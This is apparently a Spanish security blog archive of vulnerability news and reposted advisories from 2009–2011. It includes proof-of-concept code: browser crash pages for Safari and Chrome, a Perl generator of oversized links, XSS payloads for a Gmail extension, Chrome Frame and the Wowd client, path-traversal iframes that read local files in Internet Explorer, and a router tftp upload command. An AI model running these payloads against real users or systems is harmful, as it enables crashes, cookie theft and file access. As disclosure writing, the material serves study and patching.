Mostrando entradas con la etiqueta bugs. Mostrar todas las entradas
Mostrando entradas con la etiqueta bugs. Mostrar todas las entradas

Fallo en Facebook permite eliminar al administrador original de las páginas de fans

06 septiembre 2011 Publicado por cLimbo 0 comentarios
A nadie se le puede escapar que hoy en día las páginas de fans en Facebook son un método de promoción efectivo. Para medios de comunicación o los propios artistas, estas páginas hoy infieren un gran feedback entre los usuarios sobre la evolución de sus actividades. Pues bien, se ha destapado que un fallo o error en las políticas de la red social permitiría secuestrar estas páginas a los administradores originales pudiendo eliminarlos.

El informe, reportado a través de Naked Security, habla de un fallo por el cual el administrador original de una página de fans, el que la crea, podría perder todos los privilegios si otro administrador al que ha nombrado quisiera. En teoría todos podríamos pensar que no es así, es decir, que el administrador original tendría más derechos sobre terceros. Si acudimos al FAQ de Facebook nos encontramos con el siguiente escrito:

El creador original de una página no podrá ser eliminado por otros administradores

En teoría y como dice la propia red social no es así, pero a través de un vídeo que han colgado desde la firma de seguridad, podemos observar como existe un error en la página que permite la eliminación completa del admin original.


Lo que vemos en el vídeo es cómo un administrador recién nombrado podría eliminar al original. Fallo o error, el método ya ha sido traslado a Facebook para corregirlo, ya que como decía al principio, la importancia de las páginas hoy podrían acarrear serios problemas con la eliminación y utilización fraudulenta de estas páginas.


Fallo de seguridad en WhatsApp permite acceder a los mensajes y números de teléfono

23 mayo 2011 Publicado por cLimbo 0 comentarios


Esto es la parte mala de vivir en este mundo altamente tecnológico en el que nos encontramos. No hay semana que pase sin que aparezca algún nuevo fallo de seguridad afectando a algún dispositivo, aplicación, sistema operativo, programa o empresa cualquiera.

Si hace unos días veíamos esa información sobre nuestra ubicación que Android y Apple almacenaba secretamente, nos encontramos ahora con un fallo en la seguridad de WhatsApp.

Esta aplicación, mundialmente famosa y a la que ya podemos considerar como de obligatorio uso en cualquier terminal que se precie con conexión a internet, ha visto como es posible acceder fácilmente a los datos contenidos en el programa debido a la no encriptación de esta información.

A pesar que en su web se informa del uso de la encriptación SSL, parece que finalmente no es así, y mediante el uso de un analizador de protocolos como Wireshark, uno puede conectarse de forma sencilla a la red WiFi que estemos utilizando, y ver todos los números de teléfono, nombres en la agenda y mensajes enviados/recibidos.


A no ser que acostumbres a enviar por WhatsApp la combinación de la caja fuerte de tu casa, la información que uno intercambia no suele ser excesivamente peligrosa en caso de ser interceptada por un tercero desconocido. Aún así, está claro que se trata de un fallo muy grave.Enlace
Así que a todos aquellos para quienes esta revelación pueda representar un auténtico dolor de cabeza, decirles dos cosas.

Por un lado, desde la empresa ya han iniciado las investigaciones sobre el problema a fin de ponerle solución lo antes posible.
Por otro, decir que mientras tanto no se soluciona, sería mejor evitar la conexión vía WiFi, y usar únicamente el 3G del móvil, que (éste sí) es inaccesible.



Vía | Gizmovil

Hackean la página de Sony en Grecia y cuelgan nombres y direcciones en la red

Publicado por cLimbo 0 comentarios
La figura de Sony es el blanco de un nuevo ataque perpetrado en la red. En este caso se trata de la página Sony BMG en Grecia. Unos hackers han encontrado una nueva brecha de seguridad en sus sistema robando datos con nombres y direcciones de correo registradas en Sonymusic.gr que más tarde se han colgado en la red.

Parece mentira lo que está ocurriendo últimamente, pero tras los continuos ataques sobre su servicio de PSN o el último de phising, Naked Security ha reportado un nuevo agujero encontrado por los atacantes, quienes más tarde no han dudado en colgar la información sustraída en Pastebin.com.

Al parecer, el hacker/s utilizaron un sistema automatizado de la herramienta SQL para encontrar sitios web vulnerables, encontrando a SonyMusic.gr. Como decía al principio, se trata del séptimo ataque que recibe la empresa en menos de dos meses. Tras el DDos de Anonymous o la brecha de seguridad que comprometió los datos de PSN y Sony Online Entertainment.

Quizá el lado positivo, como apuntan en alguna web, es que Sony pueda llegar a convertirse en la empresa que mejor seguridad tenga en un futuro a la vista de las vulnerabilidad de las que ha sido objeto.



Vía | Bitelia

Safari for windows Invalid SGV text style Webkit.dll DoS

02 septiembre 2010 Publicado por cLimbo 0 comentarios
###################################################
Safari for windows Invalid SGV text style Webkit.dll DoS
Afectado: www.apple.com
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Notificación al afectado: Sí Exploit disponible: Sí
###################################################

Safari Browser (en windows) es vulnerable siendo propenso a Denegaciones de Servicio, este problema afecta a webkit.dll y se bloquea al tratar de hacer que Safari abra una imagen SGV con un tamaño grande de fuente.

############
versiones
############

Safari para windows 5.0.1 (7533.17.8)
en windows 7 ultimate completamente parcheado.

Safari para windows windows 5.0.1 (7533.17.8)
en windows xp home sp3 completamente parcheado.

############
Línea de tiempo
############

Descubierto:19-08-2010
Notificado al vendedor:25-08-2010
Respuesta del vendedor:26-08-2010
Publicado: 30-09-2010

####################
PoC
####################

Guarda el código como "image.svg" y ábrelo con Safari, mirad como se añaden algunos píxeles "extra" en estilo de la fuente en el tamaño del texto.

################ BOF image.svg ######################

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>

<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
---
thz Lost ;-)

Google Chrome and Chrome frame Prompt DoS

16 agosto 2010 Publicado por cLimbo 0 comentarios
###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de "mensajes de alerta" cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.


###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongluencia en todos los sistemas :)


######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)


##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
"window manager button" and we can´t no change beetwen applications
that we have open.


##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)


####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################


<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>


################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>

################# EOF ###################


############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
------------

thz Lost ;-)

Safari for windows Long link DoS

04 agosto 2010 Publicado por cLimbo 0 comentarios
############################################
Safari for windows Long link DoS
URL del creador: http://www.apple.com/safari/
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Creador notificado: SÍ exploit disponible: SÍ
############################################

Safari es vulnerable a tareas con un enlace muy largo. Este problema es explotable por medio de enlaces web, como <a href="very long URL">click here</a> o vectores similares. Safari no ejecuta el enlace y congelada a su vez el navegador, acabando en una condición de denegación de servicio (DoS).

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable


windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable


############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

####################
PoC
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Links Relacionados
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Caso de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
------------------
thz Lost ;-)
Etiquetas: , , ,

Gmail Checker plus Chrome extension XSS

03 junio 2010 Publicado por cLimbo 0 comentarios
######################################
Gmail Checker plus Chrome extension XSS
Extensión: https://chrome.google.com/extensions/detail/mihcahmgecmbnbcchbopgniflfhgnkff
Reportado por: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html
Exploit disponible:
#######################################

En este caso "Google Mail Checker Plus" la versión 1.1.7 (02/10/2010) tiene un bug que permite a atacantes para realizar ataques XSS.

Todas las extensiones se ejecutan sobre su origen y no hay forma de alterar datos o la extensión para obtener datos sensibles como; cuentas de correo electrónico, contraseñas, etcétera.


Podemos observar cuántos usuarios se han instalado esta extensión =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe 303,711 users (WoW)

############
Explicación
############

Google Mail Checker Plus permite a los usuarios ver cuando tienen un nuevo correo y
ver una vista previa del correo...

Si un atacante compone un nuevo correo con el código HTML o JavaScript en el campo del asunto y lo envía a la víctima, el código se ejecuta cuando haga click la víctima en la extensión para ver el correo y la víctima cuando acepte la alerta y ver una vista previa del correo el iframe se ejecutará a su vez.

Gmail es un lugar seguro, pero la extensión a su manejo, puede ser un potencial vector para atacarlo.


Por ejemplo; podríamos enviar un correo electrónico que accione el cierre de sesión en GMail y ponemos en el asunto:

"><iframe src="https://mail.google.com/mail/?logout&hl=es"<>/iframe>

Con esto se cerraría la sesion de GMail, se trata de un XSRF, y, en el caso de lo que tú dices es ejecutado en el contexto y el valor location.href es: "about:blank"

Por lo que tenemos disputas en: http://code.google.com/p/chromium/issues/detail?id=45401

El desarrollador ha comunicado una versión del parche en trunk: http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js

Podéis bajarlo y copiarlo a la carpeta de la extensión para solventar el problema.

Ver Diff: http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0

######################€nd#################################
.

Thnx for your time !!!

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

----

thz Lost ;-)
Etiquetas: , , , , ,

Flock browser marquee tag DoS

01 abril 2010 Publicado por cLimbo 0 comentarios
############################################
Flock browser marquee tag DoS

Reportado por: http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html

############################################

El navegador Flock contiene un fallo que puede permitir una denegación de servicio remota.

El problema se desencadena cuando una víctima visita una página web especialmente diseñada
con muchos tags html -> marquee y el resultado será la pérdida de disponibilidad (DoS) para el navegador y la posible corrupción de memoria.

Este error fue descubierto por primera vez por
'599eme Man flouf@live.fr' y esta es una investigación extendida por él, fue descubierto en los navegadores:

Opera 10.10
Firefox 3.5.7
Safari 4.0.4
SeaMonkey 2.0.1

y probado en:

Flock Browser 1.2.6 vulnerable
Flock Browser 2.5 vulnerable

el código de ejemplo podéis encontrarlo aquí:

http://www.exploit-db.com/exploits/11347

########################€nd ###################

Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
-----
Traducido por; cLimbo
-----
thz Lost ;-)

Internet explorer 7 & 8 URL Validation Vulnerability

25 febrero 2010 Publicado por cLimbo 0 comentarios
############################################
Internet explorer 7 & 8 url validation vulnerability
Reportado por: http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html
URL afectada: http://www.microsoft.com
Avance acerca del bug: http://lostmon.blogspot.com/2010/02/internet-explorer-6-7-8-url-validation.html
Boletines relacionados: MS10-002 and ms10-007
CVE relacionado 2010-0027
OSVDB ID relacionado: 62245 and 62245
Secunia relacionado: SA38501 and SA38209
BID relacionado: 37884
############################################

############
Descripción
############

Internet Explorer contiene una vulnerabilidad de ejecución remota de código al validar correctamente la entrada.
Un atacante podría aprovechar esta vulnerabilidad mediante la construcción de una URL especialmente diseñada. Cuando un usuario hace click en la URL, la vulnerabilidad podría permitir la ejecución remota de código si ésto no se parchea.
Un atacante que aprovechase esta vulnerabilidad podría obtener los mismos derechos de usuario como usuario administrador registrado.

#################
Versiones afectadas
#################

Está probado en las versiones Internet Explorer 7 & 8 de windows.

En todas las versiones de Windows 7

Windows xp home y Windows xs pro

Por lo que podéis buscar en el boletín de Microsoft en qué sistemas es o no vulnerable para obtener una lista de todos los productos afectados por este bug.

#############
Seguimiento
#############

descubierto: 05/11/2009
informe al proveedor 15-11-2009
respuesta de los proveedores :15-11-2009
aceptación de proveedor en administrar el caso 19-11-2009
parcheo del proveedor 21-01-2010
distribuidor Patch2 :09-02-2010
divulgación pública: 21-01-2010
detalles de divulgación :10-02-2010

##############
Solución
##############

Ver: http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
y: http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx

para más detalles bajar el parche de Microsoft

#######################
Código de ejemplo y PoC
#######################

Esta vulnerabilidad está basada en la forma de cómo Internet Explorer valida los controladores de URI así como el char especial '#'

Para las pruebas y entendiendo primero de Internet Explorer, lo abrimos y ecribimos en la barra de direcciones una dirección falsa: `handler:' esto causa que IE nos redirija a una página interna 'res://ieframe.dll/unknownprotocol.htm' a causa de protocolo desconocido.

y si hacemos => handler:http://[some-host]', IE espera a abrir el host, pero no muestra ningún error o error desconocido de protocolo.

Si volvemos a escribir en la barra de direcciones: 'handler:handler2:' IE nos vuelve a redirijir a la página anterior: 'res://ieframe.dll/unknownprotocol.htm'

Pero si concadenamos dos controladores de protocolo y usamos el char especial '#' usando: 'handler:handler#:' IE nos muestra una alert diciendo "internet explorer no encuentra file:///'

Con esta combinación IE usa el controlador de protocolo.

Con este alert podemos pensar ... si queremos concadenar dos controladores y el char # y una ruta de archivo a la cual podemos tener acceso a los archivos en el disco duro.

"handler:handler#:c:\windows\calc.exe'
Pero nuevamente nos dice que 'internet explorer no encuentra el archivo'

Y si ponemos el acceso de archivos como trasversal: handler:handler#:../../../../C:\windows/calc.exe’
Ejecuta un prompt para descargar el archivo y hemos eludido las restricciones bypass!!

Así estamos trabajando en la barra de direcciones.

Una página web puede utilizar esta vulnerabilidad para aprovecharla y pedir para descargar el fichero que sea ? SÍ

podemos construir una página web con un iframe como por ejemplo:

############# PoC primero #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe">
</html>
################# EOF #################

Si lo abrimos a través de la carpeta local, o mediante un servidor local o como servidor de LAN o un servidor remoto, en todos los casos, por ejemplo preguntándole para descargar.

Podemos acceder a cualquier archivo en el disco duro de manera que se puede ejecutar o leer el contenido de un archivo ? SÍ

############## PoC segundo #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt">
</html>

############# EOF #################

Cuando abrimos este PoC, lee el contenido de our_txtfile.txt y lo muestra en el marco.

Podemos ejecutar archivos ? SÍ

Se puede ejecutar un archivo HTML o un archivo XML o búsqueda-ms
desde el disco duro por ejemplo:

############# PoC tercero ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>

############### EOF ###########

Si miramos Explorer se ejecuta una búsqueda en local :D

Se puede leer el contenido de cualquier archivo y subirlo a un servidor o gestionar el contenido ? Yo no he encontrado una manera de hacerlo, ya que a veces Internet Explorer niega el acceso a los contenidos del iframe.

############# PoC cuarto ##############

<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);

content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>

<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>

</body>
</html>

##################### EOF #############################

Que daría un error de acceso denegado, si utilizásemos XMLHttpRequest () sigue sin funcionar y de nuevo nos deniega el acceso:

########### PoC quinto ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;

Internet explorer 6, 7 y 8 URL Validation Vulnerability

15 febrero 2010 Publicado por cLimbo 0 comentarios
###################################
Internet explorer 6 7 and 8 URL Validation Vulnerability
Afectado: http://www.Microsoft.com
Notificación al afectado: Confirmación del afectado:
REF Boletín:MS10-002
#########################################

Internet Explorer contiene una vulnerabilidad de ejecución remota de código al validar correctamente la entrada.
Un atacante podría aprovechar esta vulnerabilidad mediante la construcción de una URL especialmente diseñada. Cuando un usuario hace click en la URL, la vulnerabilidad podría permitir la ejecución remota de código si ésto no se parchea.
Un atacante que aprovechase esta vulnerabilidad podría obtener los mismos derechos de usuario como usuario registrado.

Por lo que si un usuario inicia sesión con derechos de usuario administrativos, un atacante que aprovechase esta vulnerabilidad podría tomar control total del sistema afectado. Se podrían instalar programas, ver, cambiar o eliminar datos o archivos, hasta crear nuevas cuentas con derechos de usuario.

Para ver esta vulnerabilidad como una entrada estándar en las listas de vulnerabilidades y exposiciones , consulte MS10-002 y CVE-2010-0027.

No hay más detalles en este momento.

Comentar que tengo un PoC pero por ahora lo mantengo en privacidad.

Tiempo transcurrido de esta vulnerabilidad:

Descubierta el: 05/11/2009
Información enviada al proveedor: 15-11-2009
Respuesta de los proveedores: 15-11-2009
Aceptación del proveedor en administrar el caso: 19-11-2009
El proveedor parchea la vulnerabilidad: 21-01-2010

################# €nd###############

Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team For support
Thnx To MSRC for Support

atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)

--------------------

thz Lost ;-)

Google Chrome Frame null domain XSS

20 noviembre 2009 Publicado por cLimbo 0 comentarios
#####################################
Google Chrome Frame null domain XSS
URL afectada: http://www.google.com/chromeframe
Changelog del vendedor: http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html
Reportado por: http://lostmon.blogspot.com/2009/11/google-chrome-frame-null-domain-xss.html
Notificación al vendedor: Exploit disponible:
######################################

######################
Descripción del vendedor
######################

Google Chrome Frame es un plug-in gratuito para Internet Explorer. Algunas aplicaciones web avanzadas, como Google Wave, contiene el uso de Google Chrome Frame para ofrecerle características adicionales y un mejor rendimiento.

Google Chrome Frame es una etapa inicial de código abierto, un plug-in que hace a la perfección Google Chrome mejorando las tecnologías web y el motor de JavaScript de Internet Explorer.

################
Versiones afectadas
################

4.0.223.9 (Official Build 29618)
WebKit: 532.3
V8: 1.3.16
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3

Versiones no afectadas:

4.0.245.1 (Official Build 31970)
WebKit: 532.5
V8: 1.3.18.6
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5

Para más información visiten:
http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html

#####################
Cross Site Scripting
#####################

Creamos un documento HTML para probar y metemos =>

<iframe src="javascript:alert(1)></iframe>

=> se abre el iframe y ejecuta el alert (esto es lo correcto)

<iframe src="cf:javascript:alert(1)></iframe>

=> esto no funciona, no muestra el alert (sigue siendo correcto)

Y aquí está el error:

<iframe src="cf:view-source:javascript:alert(1)></iframe>

Este code ejecuta y muestra el alert que funciona en local y a su vez en remoto o también a través de la barra de dirección.

Esto pasa las políticas de origen de datos !!

Para probar el navegador Google Chrome ponemos en la barra de dirección =>

view-source:javascript:alert(1)

Esto ejecuta el alert, aun así Google hace poco decidió realizar unos cambios en él como poner la página en blanco, este tema es sólo explotable a través de la barra de direcciones, no en un iframe o frame o documento html, así que por ese motivo creo que este problema no es explotable remotamente.

###########
Crashes
###########

cf:view-source:about@: => se rompe
cf:about@: => rompe el tab

##########
Solución
############

Google automáticamente ha sacado una nueva versión de Chrome Frame 4.0.245.1 (Official Build 31970) y esta versión no está afectada por esta vulnerabilidad.

#################€nd#############
Etiquetas: , ,

Wowd search client multiple variable XSS

27 octubre 2009 Publicado por cLimbo 0 comentarios
##########################################
Wowd search client multiple variable XSS
URL afectada: http://www.wowd.com/
Avisado por: http://lostmon.blogspot.com/2009/10/wowd-search-client-multiple-variable.html
Notificación al vendedor: exploit disponible:
##########################################

################
¿Qué es Wowd?
################

Wowd es un motor de búsqueda que sirve para descubrir lo más popular de las webs en tiempo real.

En esencia, la compañía ha hecho un p2p como motor de búsqueda, por lo que otros usuarios Wowd que hay en línea pueden estudiar y usar sitios del ranking basada en una estructura de enlaces arcanos.

Teniendo una búsqueda y dividiéndola en millones de pequeñas piezas todas ellas dirigidas por los usuarios individuales que han descargado el cliente Wowd cambia completamente la operación - y la economía - del motor de búsqueda. Cuantas más veces clicken dentro de Wowd en un enlace dentro de un tiempo "x" el ranking será más alto ya que es mayor el vínculo.

##########################
Descripción de la vulnerabilidad
##########################

El cliente Wowd contiene un error que permite a ejecutar un codigo remoto cross site scripting (XSS). Este error existe porque la aplicación no es valida en el cuadro de diálogo URI '' SortBy 'tags' y 'variables CTX' en envio a script 'index.html'. Esto podría permitir a un usuario crear especialmente un código a través de una dirección URL que ejecutaría arbitrariamente en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, esto produciría una pérdida de integridad.

Este problema puede ser peligroso, porque si se está ejecutando el cliente Wowd, usted tiene esta vulnerabilidad, porque este problema puede ser aprovechado en todos los navegadores, hasta en IE8 con el filtro anti-XSS (WoW!)

#################
Versiones
################·

Wowd client 1.3.0

#################
SOLUCIÓN
#################

No hay solución por el momento !!!

###################
PoC
###################

#############
Prueba
#############
Puedo probar en IE8, Firefox 3.5.3 y Safari 4



En todos los casos que el XSS se ejecuta incluso a IE8 con anti-XSS :D

un usuario remoto puede redactar un documento html con un iframe y esta fuente para el iframe:

http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
el navegador ejecuta el XSS, y se accede directamente a esta dirección URL:



de forma adicional Wowd puede mostrar sus resultados, ya que tenemos una funcionalidad para agregar "etiquetas" a una dirección URL.

Ejemplo:


http://localhost:8101/wowd/index.html?search&query=a&
sortby=rank&tags=english|S0B0707656E676C6973680D02

Esto muestra una búsqueda indexada con la etiqueta 'english', se puede añadir una etiqueta diseñada por tí mismo que permita la ejecución de un XSS como: [tag]|[token]

ejemplo:

http://localhost:8101/wowd/index.html?search&query=a
&sortby=rank&tags=english|S0B0707656E676C6973680D02,
%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02
y se ejecuta el XSS en las etiquetas de las etiquetas creadas



CTX se vé también variablemente afectado

http://localhost:8101/wowd/index.html?search&page=2&q=
&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
--
atentamente:
Lostmon (lostmon@gmail.com)
--------
Browser: Internet Explorer 8 (Windows)
Browser: Firefox 3.5 (Windows)
Browser: Safari 4 (Windows)
----------

thz Lost ;-)


IE8 Save as Title Bug

17 septiembre 2009 Publicado por cLimbo 0 comentarios
IE8 tiene un pequeño "bug", permite denegar la función "guardar como" si el documento html tiene un título largo.

De forma predeterminada cuando un usuario intenta hacer click en "guardar como" el navegador utiliza el título del HTML como el nombre del archivo para guardarlo, pero si este título es muy largo, el explorador da un error porque no puede guardar este archivo.

Internet Explorer no guarda los archivos que en el nombre contienen más de 261 caracteres, ya que el Explorador da un aviso con un error de que el archivo no se puede guardar.

Creo que esto no tiene implicación alguna en la seguridad, le envié un mail a MSRC comentándoles la cuestión y ellos piensan lo mismo.

Respuesta de MSRC:

"De acuerdo con su apreciación de que este no parece ser una cuestión de seguridad, puede ser un error y informaré para que lo tengan en cuenta en un futuro al sacar una no-actualización de seguridad"

Aquí tenéis el PoC de este "bug", es muy simple;

<HTML>
<TITLE>A*261 chars</TITLE>
<HTML>

###########End #################

thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

-----------

thz Lost ;-)

Comtrend HG536+ poligon firmware tftp vulnerable

19 junio 2009 Publicado por cLimbo 0 comentarios

##########################################
Comtrend HG536+ poligon firmware tftp vulnerabilidad
URL del vendedor: www.comtrend.com
info: www.adslzone.net/firmware-adslzone-poligon.html
Avisado por: http://lostmon.blogspot.com/2009/06/comtrend-hg536-poligon-firmware-tftp.html
Aviso al vendedor: NO Exploit: lean la explicación
#########################################

##############
Historia
##############

Trata de una investigación ampliada en varias vulns =>

http://rootdev.blogspot.com/2009/04/vulnerabilidades-en-comtrend-hg536.html

y => http://www.securityfocus.com/bid/32975

poligon firmware tiene los mismos fallos.

#####################
Descripción del vendedor
Comtrend
#####################

El HG536+ es un 802.11g (54 Mbps) cableada e inalámbrico incluyendo Red de área local (WLAN) router ADSL. Cuatro 10/100 Base-T Ethernet proporcionan conectividad LAN cableada 802.11g integrada con un punto de acceso WLAN Wi-Fi para conectividad inalámbrica.

###################
Descripción Poligon firmware
ADSLZone
####################

Poligon ADSLzone procede de varios fabricantes de firmware y proveedores que utilizan Internet (Asus, U.S Robotics, Comm Net , Broadcom, Deutsche Telekom, Alice Italy, Pirelli (Italia), Bungury (Rusia) y Vodafone (Thailandia).

################
Vulnerabilidades
################

Este firmware tiene un error en el servicio TFTP, si han permitido que un usuario de acceso de LAN accediera al servidor tftp y/o el acceso de WAN, este router es propenso a una vulnerabilidad DoS.

en el archivo de configuración podemos buscar que permitió los servicios concretamente en esta línea =>

—————————————————
srvCtrlList ftp=”lan” http=”lan” icmp=”lan”
snmp=”disable” ssh=”disable” telnet=”lan” tftp=”lan”
—————————————————-

en este caso han permitido el acceso de LAN tftp

Bien, les mostraré cómo funciona esta vulnerabilidad:

Hay que crear un nuevo archivo html, por ejemplo; tweaking.html (este archivo existe en firmware Poligon pero puedes utilizar otras que tienes tu router concretamente en las carpetas de /webs).

vamos a tratar de subirlo a la máquina desde mi /webs

tftp-i 192.168.1.1 put c: \tweaking.html /webs

